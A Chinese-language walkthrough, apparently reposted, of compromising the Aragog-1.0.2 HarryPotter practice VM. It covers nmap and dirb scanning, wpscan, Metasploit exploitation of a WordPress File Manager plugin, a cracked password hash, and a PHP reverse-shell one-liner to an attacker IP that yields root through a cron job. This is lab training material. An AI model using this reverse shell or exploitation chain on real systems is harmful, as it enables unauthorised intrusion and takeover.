Aragog 是 3 HarryPotter VM 系列中的第一個(gè) VM，您需要在其中找到隱藏在機(jī)器內(nèi)的 2 個(gè)魂器（哈利波特系列的 3 個(gè) VM 中總共隱藏了 8 個(gè)魂器）并最終擊敗 Voldemort。

信息收集

nmap掃描

nmap -sC -sV 192.168.210.148

IP地址靶機(jī)登錄界面已經(jīng)給出 根據(jù)掃描結(jié)果可得22ssh ，80http
?

網(wǎng)站信息收集

只有一張圖片

爆破一下網(wǎng)站目錄
?

dirb http://192.168.210.148

爆出來(lái)一個(gè)blog

頁(yè)面有點(diǎn)奇怪，點(diǎn)擊頁(yè)面都會(huì)錯(cuò)誤，推測(cè)需要域名解析，去/etc/hosts中寫(xiě)一下域名解析

哎，這就好了嘛

既然cms為wordpress那么必須得用wpscan跑一跑
直接掃沒(méi)掃出什么有效信息，版本沒(méi)有問(wèn)題那可能插件有漏洞（noitce中提示），嘗試wpscan注冊(cè)賬號(hào)，帶上 api-token 跑一跑
?

注冊(cè)wpscan一個(gè)賬號(hào) https://wpvulndb.com/users/sign_up

wpscan --api-token=免費(fèi)版的就行 --url=http://192.168.210.148/blog -e p --plugins-detection aggressive

掃出3個(gè)問(wèn)題，全是File Manager的漏洞

漏洞利用

msf getshell

msf檢索漏洞exp

調(diào)試好參數(shù)

search wordpress File Manager
use 1
set rhosts wordpress.aragog.hogwarts
set targeturi /blog
set lhost 192.168.210.40
run
?

在/etc/wordpress/config-default.php 中發(fā)現(xiàn)了數(shù)據(jù)庫(kù)的用戶名密碼

python調(diào)bash
python3 -c 'import pty; pty.spawn("/bin/bash");'
?

登錄mysql數(shù)據(jù)庫(kù)

查詢數(shù)據(jù)庫(kù)信息

得到用戶hagrid98 $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
界面后可得 密碼為password123

ssh登錄

成功拿到第一個(gè)魂器

提權(quán)

在/opt下發(fā)現(xiàn)一個(gè)隱藏腳本，可以拷貝文件

?

在tmp下創(chuàng)建php反彈shell馬

<?php $sock=fsockopen("192.168.210.40",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

?>
?

?

將腳本添加兩行

kali建通端口，等待不超過(guò)1分鐘
成功獲得root權(quán)限

家目錄下拿到第二個(gè)魂器

能彈shell的原因是root有一個(gè)計(jì)劃任務(wù)

總結(jié)

以上是生活随笔為你收集整理的HarryPotter第一部—Aragog-1.0.2的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。